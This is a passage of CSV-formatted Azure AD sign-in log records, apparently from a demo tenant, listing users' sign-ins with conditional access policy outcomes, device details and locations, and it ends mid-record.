+690,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:36.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",6d9cea8b-fbf7-41d5-8285-85bac2221400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,6d9cea8b-fbf7-41d5-8285-85bac2221400,SigninLogs,Sucess,50.6406517,5.572050095
+691,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:59.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4c1a4d95-77d1-4cbb-b1c0-e381bfa72e16,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",a9f59943-bd83-455b-86cd-4cf197fe1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,a9f59943-bd83-455b-86cd-4cf197fe1400,SigninLogs,Sucess,33.7984581,-84.38828278
+692,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:38.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:27,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",738fc06f-0aae-42ae-87fe-a657ec496a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,738fc06f-0aae-42ae-87fe-a657ec496a00,SigninLogs,Sucess,40.75891113,-73.97901917
+693,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,29:00.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:29,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",d77c7786-598c-479a-9381-435030f30e00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,d77c7786-598c-479a-9381-435030f30e00,SigninLogs,Sucess,51.4458313,-0.969720006
+694,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,30:35.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,85224c1b-590f-46bf-8c5e-e6a86fbfb529,Microsoft.aadiam,Microsoft.aadiam,,Cristhofer Romeo Muñoz,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:30,"{'operatingSystem': 'Windows 10', 'deviceId': '7f732ad5-ac1d-4ebc-9553-15e7692c93a8', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-QGUPO1L', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",037faf71-efb6-4984-8ebb-22635f996100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -73.97901916503906, 'latitude': 40.7589111328125}, 'state': 'New York', 'city': 'New York'}",none,none,none,none,[],{'errorCode': 0},Cristhofer Romeo Muñoz,f0c37589-c602-4575-a536-9b66feacf56c,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,037faf71-efb6-4984-8ebb-22635f996100,SigninLogs,Sucess,40.75891113,-73.97901917
+695,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:52.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cd44f1a4-3470-42be-b6cc-25bcee1a9015,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 14:33,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",d16ce29f-69c9-4fdc-aaad-2002e20d4e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,d16ce29f-69c9-4fdc-aaad-2002e20d4e00,SigninLogs,Sucess,32.32146072,34.85319901
+696,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:48.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cbe2ca82-512e-4c05-941a-b0e92a49a57b,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:32,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.478', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",d8cc9a0b-af3e-47ed-a4bd-60439fbb7000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,d8cc9a0b-af3e-47ed-a4bd-60439fbb7000,SigninLogs,Sucess,35.01296997,-80.93171692
+697,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:02.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b4563623-970b-4af7-a8c7-a97237b64b23,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 